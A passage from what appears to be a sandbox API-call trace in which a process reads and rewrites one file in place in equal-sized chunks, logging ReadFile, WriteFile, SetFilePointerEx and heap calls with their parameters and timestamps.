lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.345] GetProcessHeap () returned 0x500000 [0121.345] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.345] GetProcessHeap () returned 0x500000 [0121.345] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.345] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x673c390, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.345] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.354] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x673c390, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.354] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.355] GetProcessHeap () returned 0x500000 [0121.355] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.355] GetProcessHeap () returned 0x500000 [0121.355] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.355] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6779420, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.355] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.363] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6779420, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.364] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.364] GetProcessHeap () returned 0x500000 [0121.364] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.364] GetProcessHeap () returned 0x500000 [0121.364] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.364] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x67b64b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.364] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.376] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x67b64b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.376] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.377] GetProcessHeap () returned 0x500000 [0121.377] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.377] GetProcessHeap () returned 0x500000 [0121.377] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.377] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x67f3540, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.377] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.393] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x67f3540, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.393] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.394] GetProcessHeap () returned 0x500000 [0121.394] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.394] GetProcessHeap () returned 0x500000 [0121.394] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.394] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x68305d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.394] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.403] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x68305d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.403] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.404] GetProcessHeap () returned 0x500000 [0121.404] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.404] GetProcessHeap () returned 0x500000 [0121.404] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.404] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x686d660, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.404] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.414] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x686d660, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.414] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.414] GetProcessHeap () returned 0x500000 [0121.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.415] GetProcessHeap () returned 0x500000 [0121.415] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.415] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x68aa6f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.415] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.424] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x68aa6f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.424] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.425] GetProcessHeap () returned 0x500000 [0121.425] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.425] GetProcessHeap () returned 0x500000 [0121.425] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.425] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x68e7780, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.425] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.443] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x68e7780, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.443] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.445] GetProcessHeap () returned 0x500000 [0121.445] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.445] GetProcessHeap () returned 0x500000 [0121.445] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.445] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6924810, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.445] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.453] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6924810, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.453] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.453] GetProcessHeap () returned 0x500000 [0121.453] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.453] GetProcessHeap () returned 0x500000 [0121.453] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.454] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x69618a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.454] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.461] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x69618a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.461] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.461] GetProcessHeap () returned 0x500000 [0121.461] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.461] GetProcessHeap () returned 0x500000 [0121.461] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.461] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x699e930, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.461] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.470] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x699e930, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.470] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.471] GetProcessHeap () returned 0x500000 [0121.471] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.471] GetProcessHeap () returned 0x500000 [0121.471] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.471] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x69db9c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.471] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.479] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x69db9c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.479] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.480] GetProcessHeap () returned 0x500000 [0121.480] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.480] GetProcessHeap () returned 0x500000 [0121.480] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.480] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6a18a50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.480] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.498] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6a18a50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.498] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.498] GetProcessHeap () returned 0x500000 [0121.499] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.499] GetProcessHeap () returned 0x500000 [0121.499] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.499] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6a55ae0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.499] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.509] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6a55ae0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.509] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.509] GetProcessHeap () returned 0x500000 [0121.509] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.510] GetProcessHeap () returned 0x500000 [0121.510] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.510] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6a92b70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.510] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.521] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6a92b70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.521] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.522] GetProcessHeap () returned 0x500000 [0121.522] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.522] GetProcessHeap () returned 0x500000 [0121.522] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.522] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6acfc00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.522] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.533] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6acfc00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.533] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.533] GetProcessHeap () returned 0x500000 [0121.533] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.533] GetProcessHeap () returned 0x500000 [0121.533] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.534] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6b0cc90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.534] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.551] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6b0cc90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.551] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.551] GetProcessHeap () returned 0x500000 [0121.551] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.551] GetProcessHeap () returned 0x500000 [0121.551] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.551] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6b49d20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.551] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.567] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6b49d20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.567] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.568] GetProcessHeap () returned 0x500000 [0121.568] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.568] GetProcessHeap () returned 0x500000 [0121.568] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.568] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6b86db0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.568] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.578] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6b86db0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.578] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.579] GetProcessHeap () returned 0x500000 [0121.579] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.579] GetProcessHeap () returned 0x500000 [0121.579] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.579] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6bc3e40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.579] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.589] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6bc3e40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.589] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.590] GetProcessHeap () returned 0x500000 [0121.590] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.590] GetProcessHeap () returned 0x500000 [0121.590] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.590] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6c00ed0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.590] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.609] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6c00ed0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.609] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.610] GetProcessHeap () returned 0x500000 [0121.610] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.610] GetProcessHeap () returned 0x500000 [0121.610] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.610] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6c3df60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.610] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.620] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6c3df60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.621] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.621] GetProcessHeap () returned 0x500000 [0121.621] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.621] GetProcessHeap () returned 0x500000 [0121.621] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.621] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6c7aff0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.621] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.631] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6c7aff0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.631] 